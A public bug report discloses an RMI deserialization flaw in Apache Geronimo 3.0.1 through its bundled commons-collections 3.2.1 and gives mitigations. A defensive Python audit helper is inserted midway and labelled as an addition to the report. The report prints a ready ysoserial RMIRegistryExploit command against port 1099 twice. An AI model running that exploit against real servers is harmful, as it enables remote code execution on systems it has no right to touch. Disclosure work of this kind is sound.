Details
- Bug
- Status: Open
- Critical
- Resolution: Unresolved
- 3.0.1
- None
- Security Level: public (Regular issues)
- linux,windows
- Important
Description
Unsupported old Geronimo versions may also be affected.
Description:
Apache Geronimo enables the Java RMI port 1099 by default and binds it to 0.0.0.0 by default. In bash, I used the "grep -R InvokerTransformer" command and found that it uses commons-collections-3.2.1.jar by default.
[root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
Binary file ./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar matches
This looks like Java deserialization can be taken for granted. But when I use the ysoserial tool's CommonsCollections1 payload, the response is:
java.lang.ClassNotFoundException: org.apache.commons.collections.map.TransformedMap (no security manager: RMI class loader disabled)
This seems to be a classpath error. In the Java 7u21 changelog:
-------------------------------------
Changes to RMI
From this release, the RMI property java.rmi.server.useCodebaseOnly is set to true by default. In previous releases the default value was false.
This change of default value may cause RMI-based applications to break unexpectedly. The typical symptom is a stack trace that contains a java.rmi.UnmarshalException containing a nested java.lang.ClassNotFoundException.
For more information, see RMI Enhancements.
---------------------------------------
So, use 7u21 to run the application.
Attack server:
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch /tmp/apache_geronimo"
Mitigation:
Commons-collections-3.2.1 users should upgrade to 3.2.2
Ports are not allowed for public access
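An audit helper for the two mitigations above, written for this rewrite and not taken from the report or from Geronimo: it flags commons-collections jars older than 3.2.2 in a repository tree and reports whether the naming port is bound on all interfaces. The property names ServerHostname and NamingPort are an assumption about Geronimo's config-substitutions.properties; the sample paths and config text are constructed.

```python
import os
import re
from pathlib import Path

# Fixed version named in the mitigation: anything older is flagged.
FIXED_VERSION = (3, 2, 2)
# Matches the Maven artifact name only (commons-collections4-* is a different artifact).
JAR_RE = re.compile(r"^commons-collections-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text):
    """'3.2.1' -> (3, 2, 1); tuples compare numerically, so '3.10' > '3.2'."""
    return tuple(int(p) for p in text.split("."))


def vulnerable_jars(paths):
    """Return the given jar paths whose commons-collections version is older than 3.2.2."""
    hits = []
    for p in paths:
        m = JAR_RE.match(os.path.basename(p))
        if m and parse_version(m.group(1)) < FIXED_VERSION:
            hits.append(p)
    return sorted(hits)


def scan_tree(root):
    """Walk an install tree (e.g. Geronimo's repository/ directory) and apply vulnerable_jars."""
    return vulnerable_jars(str(p) for p in Path(root).rglob("*.jar"))


def registry_exposure(config_text):
    """Parse key=value lines (assumed keys: ServerHostname, NamingPort) and return
    (host, port, exposed); exposed is True when the registry listens on all interfaces."""
    props = {}
    for line in config_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            props[key.strip()] = value.strip()
    host = props.get("ServerHostname", "")
    port = int(props.get("NamingPort", "1099"))
    return host, port, host in ("0.0.0.0", "::")


if __name__ == "__main__":
    # Constructed sample input mirroring the grep hit in the report.
    sample_paths = [
        "./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar",
        "./repository/commons-collections4/commons-collections4/4.0/commons-collections4-4.0.jar",
    ]
    sample_config = "# constructed\nServerHostname=0.0.0.0\nNamingPort=1099\n"
    print("vulnerable jars:", vulnerable_jars(sample_paths))
    print("registry exposure:", registry_exposure(sample_config))
```

Run `scan_tree("/path/to/geronimo")` against a real install to get the same check over the whole repository directory.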
Exploit:
(precondition: the server runs JRE version 7u21)
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch /tmp/apache_geronimo"
Credit:
This issue was discovered by QingTeng cloud Security of Minded Security Researcher jianan.huang